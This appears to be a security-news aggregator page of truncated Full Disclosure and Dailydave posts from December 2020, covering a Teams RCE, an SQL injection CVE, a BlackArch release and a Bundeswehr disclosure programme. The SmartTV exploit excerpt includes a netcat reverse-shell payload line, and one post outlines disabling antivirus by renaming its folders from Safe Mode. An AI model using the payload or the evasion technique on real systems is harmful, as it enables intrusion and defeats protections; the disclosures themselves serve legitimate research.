Security News

How many treadmills can you run on at once?

Daily Dave - 8 December, 2020 - 14:03

Posted by Dave Aitel via Dailydave on Dec 08

I wanted everyone to browse here and enjoy this Microsoft Teams
vulnerability: https://github.com/oskarsve/ms-teams-rce/blob/main/README.md

I also enjoy the discussion
<https://twitter.com/taviso/status/1336365194071535617?s=20> it has
engendered when it comes to how to measure vulnerabilities that are "in the
cloud" or via "Auto-update". It would be good to get clarity on these
things.
[image: image.png]

Measurement...

Re: Disable Windows Defender and most other 3rd party antiviruses

Full Disclosure - 8 December, 2020 - 11:24

Posted by Exibar on Dec 08

Would this not be the same as uninstalling the AV application in safemode?

-----Original Message-----
From: Fulldisclosure [mailto:fulldisclosure-bounces () seclists org] On Behalf
Of Roberto Franceschetti
Sent: Sunday, December 6, 2020 9:01 PM
To: fulldisclosure () seclists org
Subject: [FD] Disable Windows Defender and most other 3rd party antiviruses

Windows Defender and most other antivirus applications can be disabled by
booting into safe...

Disable Windows Defender and most other 3rd party antiviruses

Full Disclosure - 8 December, 2020 - 00:56

Posted by Roberto Franceschetti on Dec 07

Windows Defender and most other antivirus applications can be disabled by booting into safe mode and renaming their
application directories before their AV services are started in Windows. The renaming of the directories can be
performed by creating a Windows NT Service that is allowed to start in Safe Mode. While Windows stops most non-Windows,
non-critical services from starting when booting in Safe mode, I was able to make sure that my...

Request for full disclosure of CVE-2020-25889 & CVE-2020-25955

Full Disclosure - 8 December, 2020 - 00:54

Posted by krishna yadav on Dec 07

Dear Team,

Please find attached POC and detailed information for CVE-2020-25889 &
CVE-2020-25955.

For CVE-2020-25889:
# Exploit Title: online bus booking system project using PHP MySQL - SQL
Injection
# Exploit Author: Krishna Yadav
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10/Kali Linux...

ProCaster LE-32F430 SmartTV RCE via libsoup/2.51.3 stack overflow (CVE-2017-2885)

Full Disclosure - 4 December, 2020 - 14:02

Posted by def on Dec 04

#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <def () huumeet info> 2020-02-15 ................. 850day exploit lol

# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"

case "${1:-${ACTION:-httpd}}" in...

New BlackArch Linux ISOs + OVA Image released!

Full Disclosure - 4 December, 2020 - 14:01

Posted by Black Arch on Dec 04

Dear list,

We've released new BlackArch Linux ISOs and OVA image (version
2020.12.01). Many improvements and QA went through all packages and
tools Blackarch Linux offers! For details see the ChangeLog below. The
BlackArch repository, Full-ISO and OVA image include more than 2600
tools now. The aarch64 repository is filled with about 2400 tools.

A ChangeLog of the Full-ISO-2020.12.01:

- added more than 100 new tools
- renamed...

Bundeswehr VDPBw 50+ reported vulnerabilities

Full Disclosure - 3 December, 2020 - 07:48

Posted by Vulnerability Lab on Dec 03

Department: Bundeswehr - CIR

Title: Over 50 reported weaknesses - a first conclusion on the
VDPBwVulnerability Disclosure Policy of the Bundeswehr

---
Date: 2020-12-03
Location: Bonn (Germany)
Reading Time: 5 min
---

Over 50 reported weaknesses - a first conclusion on the
VDPBwVulnerability Disclosure Policy of the Bundeswehr

At the end of October, the Bundeswehr called on IT security researchers
to actively inform the Bundeswehr of weak...
Syndicate content